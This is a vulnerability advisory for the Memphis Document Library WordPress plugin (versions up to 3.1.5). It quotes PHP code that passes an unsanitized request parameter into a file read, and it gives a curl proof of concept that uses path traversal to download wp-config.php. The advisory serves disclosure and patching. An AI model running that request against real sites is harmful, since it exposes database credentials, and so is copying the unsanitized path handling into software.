Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download



Description
The function "mdocs_img_preview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus, allowing to download arbitrary files in the file system.

The vulnerable GET parameter is "mdocs-img-preview".

The vulnerable code is in lines 90 to 93 of file "memphis-documents-library/mdocs-downloads.php":

87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }
Proof of Concept
curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php

Affects Plugin

fixed in version 3.1.6

References

EXPLOITDB 39593

Classification

Type BYPASS

Miscellaneous

Submitter Felipe Molina
Submitter Twitter felmoltor
Views 5185
Verified No
WPVDB ID 8419

Timeline

Publicly Published 2016-03-22 (over 3 years ago)
Added 2016-03-22 (over 3 years ago)
Last Updated 2019-10-31 (17 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin